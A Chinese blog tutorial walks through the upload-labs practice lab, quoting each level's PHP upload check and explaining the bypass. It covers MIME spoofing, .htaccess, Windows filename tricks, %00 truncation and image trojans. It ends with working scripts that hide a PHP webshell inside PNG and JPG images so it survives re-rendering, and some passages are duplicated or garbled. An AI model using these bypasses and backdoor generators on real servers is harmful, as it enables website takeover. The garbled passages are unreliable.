ashx文件 验证是否登录_Web文件上传漏洞小结

最新推荐文章于 2024-08-05 10:43:43 发布
最新推荐文章于 2024-08-05 10:43:43 发布
阅读量606 收藏
点赞数
文章标签: ashx文件 验证是否登录 jsp文件上传 uploadify swf文件不正常 upload上传 内容绕过 web点击submit跳转到下一个jsp 怎么修改file文件框的无文件提示

在现代互联网的Web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,然而向用户提供的功能越多,Web应用受到攻击的风险就越大,如果Web应用存在上传文件漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获得网站权限。

文件上传漏洞介绍

在一般情况下,文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。要完成这个攻击,需要满足如下几个条件:

  • 上传的文件后所在的目录要是Web容易能够覆盖到的路径,可以被Web容器解释执行。

  • 用户能够从Web上访问到这个文件。

  • 用户上传的文件不会被安全检查、格式化、图片压缩等功能改变了内容。

文件上传漏洞利用

本文结合upload-labs来对此种漏洞在PHP中的表现做一讲解。

Pass-01 前端JS检验绕过

代码
1234567891011121314151617
function checkFile() {    var file = document.getElementsByName('upload_file')[0].value;    if (file == null || file == "") {        alert("请选择要上传的文件!");        return false;    }    //定义允许上传的文件类型    var allow_ext = ".jpg|.png|.gif";    //提取上传文件的类型    var ext_name = file.substring(file.lastIndexOf("."));    //判断上传文件类型是否允许上传    if (allow_ext.indexOf(ext_name + "|") == -1) {        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;        alert(errMsg);        return false;    }}

这是一个前端验证的上传点,针对这种情况我们一般有以下3种绕过方法。

绕过方式
禁用JS代码

Chrome浏览器在控制台的设置中可以直接禁用JS代码。

删除上传按钮的onsubmit属性

612972520a73cede471439a488253886.png

Burp修改后缀

先将想要上传的php脚本的后缀修改为jpg绕过前端,使用burp截断后修改jpg为php继续上传即可。

Pass-02 MIME类型绕过

代码
12345678910111213141516171819
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '文件类型不正确,请重新上传!';        }    } else {        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';    }}

白名单的方式检查Content-Type,使用MIME绕过。

绕过方式
MIME

在客户端上传文件时,通过Burp抓取数据包,当上传一个php格式的文件时,可以看到数据包中的Content-Type的值时application/ostet-stream,而上传jpg格式的文件时,数据包中Content-Type的值是image/jpeg。

上传php格式文件:

e34a6e65eb54e0eca5316a36e09a8e72.png

上传jpg格式文件:

dc7e55933fbb74da22101ab32e87f95d.png

所以对于这种情况,我们只需要使用burp抓包并修改Content-Type字段的内容即可。

Pass-03 利用特殊后缀名绕过

代码
123456789101112131415161718192021222324252627
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array('.asp','.aspx','.php','.jsp');        $file_name = trim($_FILES['upload_file']['name']);        $file_name = deldot($file_name);//删除文件名末尾的点        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext); //转换为小写        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA        $file_ext = trim($file_ext); //收尾去空        if(!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file,$img_path)) {                 $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}

仅仅过滤了.asp、.aspx、.php、.jsp后缀文件,可以更改httpd.conf使得可以解析.php2类似的后缀文件。

绕过方式
httpd.conf配置文件

上传一个php文件后,提示不允许上传.asp,.aspx,.php,.jsp后缀文件!

模拟一下真实操作,F12查看Response Header,服务器端是Apache+PHP 5.2.17,使用黑名单的方式过滤了

.asp,.aspx,.php,.jsp文件后缀。但是有些Apache是允许解析其他文件后缀的,例如在httpd.conf中,如果配置有如下代码,则能够解析php、php3和phtml。

1
AddType application/x-httpd-php .php .php3 .phtml

所以我们这时只需要将文件名修改为.php3就可以成功上传shell。

解析顺序

在Apache的解析顺序中,是从右到左开始解析文件后缀的,如果最右侧的扩展名不可识别,就继续往左判断,直到遇到可以解析的文件后缀为止,所以如果上传的文件名类似1.php.xxxx,因为后缀xxxx不可解析,所以向左解析后缀php。

17226ababc1872b213ae55a610f885c6.png

Pass-04 利用.htaccess绕过

代码
123456789101112131415161718192021222324252627
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");        $file_name = trim($_FILES['upload_file']['name']);        $file_name = deldot($file_name);//删除文件名末尾的点        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext); //转换为小写        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA        $file_ext = trim($file_ext); //收尾去空        if (!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '此文件不允许上传!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}

黑名单过滤了一大堆文件名,考虑上传.htaccess文件使得Apache可以将jpg文件解析成php文件。

绕过方式
解析顺序

同Pass-03

.htaccess文件

什么是.htaccess?

  1. .htaccess是一个纯文本文件,里面存放Apache服务器配置相关指令;

  2. .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等;

  3. .htaccess的用途范围主要针对当前目录。

我们可以上传一个.htaccess文件,使得Apache可以将jpg文件解析成php文件,但要注意并不是任何时候都可以上传一个有效的.htaccess文件,在让.htaccess生效之前还需要对httpd.conf文件进行配置:

  1. 修改httpd.conf,启用AllowOverride:

    1
    AllowOverride All

  2. 修改httpd.conf,增加如下语句:

    1
    LoadModule rewrite_module modules/mod_rewrite.so

.htaccess文件:

1
AddType application/x-httpd-php .jpg

再上传.htaccess文件,这样Apache就可以将jpg文件解析成php文件。

format,png

Pass-05 利用后缀名大小写绕过

代码
12345678910111213141516171819202122232425
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");        $file_name = trim($_FILES['upload_file']['name']);        $file_name = deldot($file_name);//删除文件名末尾的点        $file_ext = strrchr($file_name, '.');        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA        $file_ext = trim($file_ext); //首尾去空        if (!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '此文件类型不允许上传!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }
绕过方式
解析顺序

分析代码,我们可以看到这句$file_ext = strrchr($file_name, '.');中的strrchr()函数是有点问题的。这个函数的意思是“函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符”。所以和Pass-03相似:当碰到不认识的扩展名时,将会从后向前解析,直到碰到认识的 扩展名,如果都不认识,则会暴露其源码。

大小写绕过

可以直接将文件改为.PHP后缀,Apache照样成功解析。

Pass-06 利用空格绕过

代码
1234567891011121314151617181920212223242526
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");        $file_name = $_FILES['upload_file']['name'];        $file_name = deldot($file_name);//删除文件名末尾的点        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext); //转换为小写        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA        if (!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file,$img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '此文件不允许上传';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}
绕过方式

相比前几题,大小写绕过和上传.htaccess文件已经行不通了,但是没有去除文件名首尾的空格。所以此处可以利用windows系统的命名规则进行绕过。

Win下xx.jpg[空格] 或xx.jpg.这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点。

在此处代码过滤了.::$DATA,但是没有去掉末尾的空格,因此上传一个.php[空格]文件即可。

空格绕过

修改文件后缀为1.php .这种形式,从代码执行流程分析来看,会先去除文件名末尾的.,去除之后的文件后缀是 .php[空格],利用.php[空格]绕过黑名单,然后利用windows的文件命名规则默认除去空格和达到上传.php的目的。

Pass-07 利用.绕过

代码
1234567891011121314151617181920212223242526
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");        $file_name = trim($_FILES['upload_file']['name']);        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext); //转换为小写        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA        $file_ext = trim($file_ext); //首尾去空        if (!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.$file_name;            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '此文件类型不允许上传!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}
绕过方式
点绕过

从代码上看,可以发现相比于Pass-06代码,加上了首尾去空,但是却少了尾部去点。故和上面Pass-06一样,利用windows文件命名规则绕过。

用burp将上传文件后缀改为.php.即可,详细原理与Pass-06类似。

Pass-08 利用$DATA::绕过(Windows环境)

代码
1234567891011121314151617181920212223242526
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");        $file_name = trim($_FILES['upload_file']['name']);        $file_name = deldot($file_name);//删除文件名末尾的点        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext); //转换为小写        $file_ext = trim($file_ext); //首尾去空        if (!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '此文件类型不允许上传!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}

绕过方式

::$DATA绕过

相比上面两道题,少了去除文件名的"::$DATA"字符串这一步,这里还是利用windows的一个特性。

在php+windows的情况下:如果文件名+"::DATA"会把::DATA"会把::DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。

用Burp将上传文件后缀改为:xx.php::$DATA即可。

Pass-09 利用.+空格+.绕过

代码
123456789101112131415161718192021222324252627
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");        $file_name = trim($_FILES['upload_file']['name']);        $file_name = deldot($file_name);//删除文件名末尾的点        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext); //转换为小写        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA        $file_ext = trim($file_ext); //首尾去空        if (!in_array($file_ext, $deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH.'/'.$file_name;            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '此文件类型不允许上传!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}
绕过方式

点+空格+点绕过

它去除了文件名末尾的点,去除了文件名尾空格,还去除了::DATA,但是从“双写”的思想出发,代码的逻辑是先删除文件名末尾的点,再去除字符串::DATA,但是从“双写”的思想出发,代码的逻辑是先删除文件名末尾的点,再去除字符串::DATA,最后首尾去空,所以我们可以使用点+空格+点的方式绕过。

也就是说,用Burp将文件名改为xx.php. .

也就是说,如果从第三关到第九关,如果目标服务器是windows系统的话,均可用点空格点绕过。

Pass-10 利用双写绕过

代码
12345678910111213141516171819
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");        $file_name = trim($_FILES['upload_file']['name']);        $file_name = str_ireplace($deny_ext,"", $file_name);        $temp_file = $_FILES['upload_file']['tmp_name'];        $img_path = UPLOAD_PATH.'/'.$file_name;        if (move_uploaded_file($temp_file, $img_path)) {            $is_upload = true;        } else {            $msg = '上传出错!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}
绕过方式
双写绕过

先分析下代码,可以看到问题出现在第8行的str_ireplace()函数,此函数在此的作用是对$file_name变量中含有$deny_ext内容的部分替换为空,但是此操作只执行一次。“只执行一次”就是问题所在,如果我们上传类似test.pphphp这样的文件,上传后文件会自动被修改为test.php进而成功上传shell。

Pass-11 利用%00截断绕过

代码
123456789101112131415161718
$is_upload = false;$msg = null;if(isset($_POST['submit'])){    $ext_arr = array('jpg','png','gif');    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);    if(in_array($file_ext,$ext_arr)){        $temp_file = $_FILES['upload_file']['tmp_name'];        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;        if(move_uploaded_file($temp_file,$img_path)){            $is_upload = true;        } else {            $msg = '上传出错!';        }    } else{        $msg = "只允许上传.jpg|.png|.gif类型文件!";    }}
绕过方式
%00绕过

分析代码发现最终返回的图片链接是“存储路径名+重命名后的文件名”,看到这个我们就可以联想到使用%00截断路径。

截断条件:
1、php版本小于5.3.4
2、php.ini的magic_quotes_gpc为OFF状态

Pass-12 利用0x00截断绕过

这里代码与上面Pass-11代码类似,不过是save_path参数由GET传入变为POST传入,利用原理也是00截断。故这里不再叙述.

Pass-13 利用图片马绕过文件头检测

代码
1234567891011121314151617181920212223242526272829303132333435363738394041
function getReailFileType($filename){    $file = fopen($filename, "rb");    $bin = fread($file, 2); //只读2字节    fclose($file);    $strInfo = @unpack("C2chars", $bin);    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    $fileType = '';    switch($typeCode){        case 255216:            $fileType = 'jpg';            break;        case 13780:            $fileType = 'png';            break;        case 7173:            $fileType = 'gif';            break;        default:            $fileType = 'unknown';        }        return $fileType;}$is_upload = false;$msg = null;if(isset($_POST['submit'])){    $temp_file = $_FILES['upload_file']['tmp_name'];    $file_type = getReailFileType($temp_file);    if($file_type == 'unknown'){        $msg = "文件未知,上传失败!";    }else{        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;        if(move_uploaded_file($temp_file,$img_path)){            $is_upload = true;        }        else{            $msg = "上传失败";        }    }}
绕过方式
GIF89a

分析下代码,发现此处就是对文件头进行了解析,此时只需要上传图片马或者在test.php文件的开头加上GIF89a即可。

21cda7426b9f72a169c45f30801f1445.png

为了检测图片马是否能正常利用,这里在upload目录中放置个文件包含文件,fileInclude.php:

1
<?php  @include($_GET['file']);?>

再使用文件包含漏洞执行上传的shell:

097acf5857d0a71d7b18a4e6252aa9d6.png

Windows命令

在Windows下使用如下命令可制作图片一句话木马:

1
copy normal.jpg /b + shell.php /a webshell.jpg

用WinHex打开生成的图片马就可以看到插入的PHP代码了:

手工添加文件头

针对文件头的检测,我们可以手工添加各种格式文件的文件头来绕过。

比如图片类型的文件幻数如下:

JPG文件:

317758f0d66f6284b25b2b292e34cdce.png

GIF文件:

所以我们就可以直接在Burp中拦截报文手工在Hex栏中在PHP木马代码前添加上JPG的文件头:

Pass-14 利用图片马绕过getimagesize()

代码
12345678910111213141516171819202122232425262728293031
function isImage($filename){    $types = '.jpeg|.png|.gif';    if(file_exists($filename)){        $info = getimagesize($filename);        $ext = image_type_to_extension($info[2]);        if(stripos($types,$ext)>=0){            return $ext;        }else{            return false;        }    }else{        return false;    }}$is_upload = false;$msg = null;if(isset($_POST['submit'])){    $temp_file = $_FILES['upload_file']['tmp_name'];    $res = isImage($temp_file);    if(!$res){        $msg = "文件未知,上传失败!";    }else{        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;        if(move_uploaded_file($temp_file,$img_path)){            $is_upload = true;        } else {            $msg = "上传出错!";        }    }}
绕过方式

PHP函数getimagesize()可以获取图片的宽、高等信息,如果上传的不是图片文件,那么getimagesize()就获取不到信息,则不允许上传。而image_type_to_extension()函数则根据图像类型返回对应的后缀名。

和Pass-13相似,使用文件合成命令生成图片马。

Pass-15 利用图片马绕过exif_imagetype()

代码
1234567891011121314151617181920212223242526272829303132333435
function isImage($filename){    //需要开启php_exif模块    $image_type = exif_imagetype($filename);    switch ($image_type) {        case IMAGETYPE_GIF:            return "gif";            break;        case IMAGETYPE_JPEG:            return "jpg";            break;        case IMAGETYPE_PNG:            return "png";            break;        default:            return false;            break;    }}$is_upload = false;$msg = null;if(isset($_POST['submit'])){    $temp_file = $_FILES['upload_file']['tmp_name'];    $res = isImage($temp_file);    if(!$res){        $msg = "文件未知,上传失败!";    }else{        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;        if(move_uploaded_file($temp_file,$img_path)){            $is_upload = true;        } else {            $msg = "上传出错!";        }    }}
绕过方式

exif_imagetype():读取一个图像的第一个字节并检查其签名。

同Pass-13生成图片马上传绕过。

get_imagesize()和exif_imagetype()对上传的图片检查有何不同:

通过调用exif_imagetype()函数判断图像类型的方法更具有容错性、能够对无法正常显示的图片马进行正常处理;而通过调用getimagesize()函数和image_type_to_extension()函数来获取图像类型并设置后缀名的方法是没办法对无法正常显示的图片马进行正常处理的。

Pass-16 二次渲染绕过

代码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384
$is_upload = false;$msg = null;if (isset($_POST['submit'])){    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径    $filename = $_FILES['upload_file']['name'];    $filetype = $_FILES['upload_file']['type'];    $tmpname = $_FILES['upload_file']['tmp_name'];    $target_path=UPLOAD_PATH.'/'.basename($filename);    // 获得上传文件的扩展名    $fileext= substr(strrchr($filename,"."),1);    //判断文件后缀与类型,合法才进行上传操作    if(($fileext == "jpg") && ($filetype=="image/jpeg")){        if(move_uploaded_file($tmpname,$target_path)){            //使用上传的图片生成新的图片            $im = imagecreatefromjpeg($target_path);            if($im == false){                $msg = "该文件不是jpg格式的图片!";                @unlink($target_path);            }else{                //给新图片指定文件名                srand(time());                $newfilename = strval(rand()).".jpg";                //显示二次渲染后的图片(使用用户上传图片生成的新图片)                $img_path = UPLOAD_PATH.'/'.$newfilename;                imagejpeg($im,$img_path);                @unlink($target_path);                $is_upload = true;            }        } else {            $msg = "上传出错!";        }    }else if(($fileext == "png") && ($filetype=="image/png")){        if(move_uploaded_file($tmpname,$target_path)){            //使用上传的图片生成新的图片            $im = imagecreatefrompng($target_path);            if($im == false){                $msg = "该文件不是png格式的图片!";                @unlink($target_path);            }else{                 //给新图片指定文件名                srand(time());                $newfilename = strval(rand()).".png";                //显示二次渲染后的图片(使用用户上传图片生成的新图片)                $img_path = UPLOAD_PATH.'/'.$newfilename;                imagepng($im,$img_path);                @unlink($target_path);                $is_upload = true;            }        } else {            $msg = "上传出错!";        }    }else if(($fileext == "gif") && ($filetype=="image/gif")){        if(move_uploaded_file($tmpname,$target_path)){            //使用上传的图片生成新的图片            $im = imagecreatefromgif($target_path);            if($im == false){                $msg = "该文件不是gif格式的图片!";                @unlink($target_path);            }else{                //给新图片指定文件名                srand(time());                $newfilename = strval(rand()).".gif";                //显示二次渲染后的图片(使用用户上传图片生成的新图片)                $img_path = UPLOAD_PATH.'/'.$newfilename;                imagegif($im,$img_path);                @unlink($target_path);                $is_upload = true;            }        } else {            $msg = "上传出错!";        }    }else{        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";    }}
绕过方式

绕过思路:对比上传前和上传后的图片的差异,找到相同数据同时又是非图片数据区的地方,在在,此处写入恶意代码。不同图像类型的插入方式有区别。

GIF

GIF二次渲染绕过说是最简单的,将源文件和二次渲染过的文件进行比较,找出源文件中没有被修改的那段区域,在那段区域写入php代码即可。

保存之后,上传该修改后的图片,能够成功利用:

PNG

png和jpg当然没有gif这么简单。这里我也不细分析了(分析不来~~)
直接记个方法,将php代码写入IDAT数据块。
用国外大牛的脚本,目的是向PNG图片的IDAT数据块中插入PHP后门代码=$_GET[0]($_POST[1]);?> :

123456789101112131415161718192021222324
<?php $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,           0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) {   $r = $p[$y];   $g = $p[$y+1];   $b = $p[$y+2];   $color = imagecolorallocate($img, $r, $g, $b);   imagesetpixel($img, round($y / 3), 0, $color);}imagepng($img,'./1.png');?>

直接运行该脚本生成1.png上传即可。

JPG

JPG图片也使用脚本来生成,根据具体情况来更改miniPayload的值:

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168
<?php     /*    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().    It is necessary that the size and quality of the initial image are the same as those of the processed image.    1) Upload an arbitrary image via secured files upload script    2) Save the processed image and launch:    jpg_payload.php     In case of successful injection you will get a specially crafted image, which should be uploaded again.    Since the most straightforward injection method is used, the following problems can occur:    1) After the second processing the injected data may become partially corrupted.    2) The jpg_payload.php script outputs "Something's wrong".    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.    Sergey Bobrov @Black2Fan.    See also:    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/    */    $miniPayload = "=phpinfo();?>";    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {        die('php-gd is not installed');    }    if(!isset($argv[1])) {        die('php jpg_payload.php ');    }    set_error_handler("custom_error_handler");    for($pad = 0; $pad < 1024; $pad++) {        $nullbytePayloadSize = $pad;        $dis = new DataInputStream($argv[1]);        $outStream = file_get_contents($argv[1]);        $extraBytes = 0;        $correctImage = TRUE;        if($dis->readShort() != 0xFFD8) {            die('Incorrect SOI marker');        }        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {            $marker = $dis->readByte();            $size = $dis->readShort() - 2;            $dis->skip($size);            if($marker === 0xDA) {                $startPos = $dis->seek();                $outStreamTmp =                    substr($outStream, 0, $startPos) .                    $miniPayload .                    str_repeat("\0",$nullbytePayloadSize) .                    substr($outStream, $startPos);                checkImage('_'.$argv[1], $outStreamTmp, TRUE);                if($extraBytes !== 0) {                    while((!$dis->eof())) {                        if($dis->readByte() === 0xFF) {                            if($dis->readByte !== 0x00) {                                break;                            }                        }                    }                    $stopPos = $dis->seek() - 2;                    $imageStreamSize = $stopPos - $startPos;                    $outStream =                        substr($outStream, 0, $startPos) .                        $miniPayload .                        substr(                            str_repeat("\0",$nullbytePayloadSize).                                substr($outStream, $startPos, $imageStreamSize),                            0,                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) .                                substr($outStream, $stopPos);                } elseif($correctImage) {                    $outStream = $outStreamTmp;                } else {                    break;                }                if(checkImage('payload_'.$argv[1], $outStream)) {                    die('Success!');                } else {                    break;                }            }        }    }    unlink('payload_'.$argv[1]);    die('Something\'s wrong');    function checkImage($filename, $data, $unlink = FALSE) {        global $correctImage;        file_put_contents($filename, $data);        $correctImage = TRUE;        imagecreatefromjpeg($filename);        if($unlink)            unlink($filename);        return $correctImage;    }    function custom_error_handler($errno, $errstr, $errfile, $errline) {        global $extraBytes, $correctImage;        $correctImage = FALSE;        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {            if(isset($m[1])) {                $extraBytes = (int)$m[1];            }        }    }    class DataInputStream {        private $binData;        private $order;        private $size;        public function __construct($filename, $order = false, $fromString = false) {            $this->binData = '';            $this->order = $order;            if(!$fromString) {                if(!file_exists($filename) || !is_file($filename))                    die('File not exists ['.$filename.']');                $this->binData = file_get_contents($filename);            } else {                $this->binData = $filename;            }            $this->size = strlen($this->binData);        }        public function seek() {            return ($this->size - strlen($this->binData));        }        public function skip($skip) {            $this->binData = substr($this->binData, $skip);        }        public function readByte() {            if($this->eof()) {                die('End Of File');            }            $byte = substr($this->binData, 0, 1);            $this->binData = substr($this->binData, 1);            return ord($byte);        }        public function readShort() {            if(strlen($this->binData) < 2) {                die('End Of File');            }            $short = substr($this->binData, 0, 2);            $this->binData = substr($this->binData, 2);            if($this->order) {                $short = (ord($short[1]) << 8) + ord($short[0]);            } else {                $short = (ord($short[0]) << 8) + ord($short[1]);            }            return $short;        }        public function eof() {            return !$this->binData||(strlen($this->binData) === 0);        }    }?>

使用方法:

  1. 先将一张正常的jpg图片上传,上传后将服务器存储的二次渲染的图片保存下来。

